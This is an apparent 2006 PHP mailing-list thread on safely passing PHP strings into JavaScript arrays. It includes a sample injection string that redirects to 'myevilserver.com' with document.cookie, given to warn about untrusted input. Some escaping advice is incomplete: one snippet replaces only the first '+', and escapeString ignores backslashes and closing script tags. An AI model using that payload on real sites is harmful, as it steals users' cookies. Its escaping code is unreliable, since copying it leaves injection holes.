NYCPHP Meetup

[Peter Sawczynec]

Another possible basic technique for the PHP to JavaScript string data
transfer. 

Once upon creating a JavaScripted slideshow that rewrote the innerHTML in
div tags to change images and their complex multi-line descriptions, I found
this ditty worked for dynamically creating the JavaScript array of
image/text/HTML data.

1) In PHP do: urlencode($str_with_HTML_and_special_chars)

2) In the JavaScript do:
replace(unescape($str_with_HTML_and_special_chars),'+',' ')

Has not choked on anything.


Warmest regards,
 
Peter Sawczynec,
Technology Director
PSWebcode
_Design & Interface
_Ecommerce
_Database Management
ps at pswebcode.com
718.796.1951
www.pswebcode.com



-----Original Message-----
From: talk-bounces at lists.nyphp.org [mailto:talk-bounces at lists.nyphp.org] On
Behalf Of Cliff Hirsch
Sent: Friday, July 07, 2006 1:47 PM
To: 'NYPHP Talk'
Subject: Re: [nycphp-talk] Passing JavaScript arrays


Thanks to all for the great responses -- very helpful. I've summarized
below:

> For security, do I just escape the output like any other variable
destined for the browser?

It depends where its coming from and what you're using it for. For example,
I have dynamic JS array's coming from the DB that may contain HTML, and will
eventually populate drop-down menu's.  For these, I pass through a 'js
cleansing' routine to trim, remove HTML tags, convert to UTF-8 (or
whatever), remove any line-breaks and escape all quotes. But I'd be
extremely wary if your JS data is coming from GET or POST.  I can see a
variable like the following jacking a JS array:

'); location='http://myevilserver.com/steal?your_cookies='+document.cookie;
//

If you're echoing a string from php into a javascript string var, you need
to escape it. Here's an example. The escapeString function here is slightly
modified from the one used in CakePHP's javascript helper:

<?php
function escapeString($string) {
   $escape = array("\r\n" => '\n', "\r" => '\n', "\n" => '\n', '"' => '\"',
"'" => "\\'");
   return str_replace(array_keys($escape), array_values($escape), $string);
}

$string = "It's good to \"escape\" strings";
?>

<script language="javascript" type="text/javascript">
// <![CDATA[
   var string = '<?php echo escapeString($string); ?>';
   alert(string);
// ]]>
</script>

If you don't want the JS to be inline, you can create a separate PHP file
that only outputs JavaScript code:

<script type="text/javascript" src="js.php"></script>

Just make sure js.php has the following before you start outputting
JavaScript:

header('content-type:text/javascript');

(From what I understand, Apache will by default cache .js files but force a
request for .php templates.  This may affect the chi of your app..  man..)

_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
New York PHP Conference and Expo 2006
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php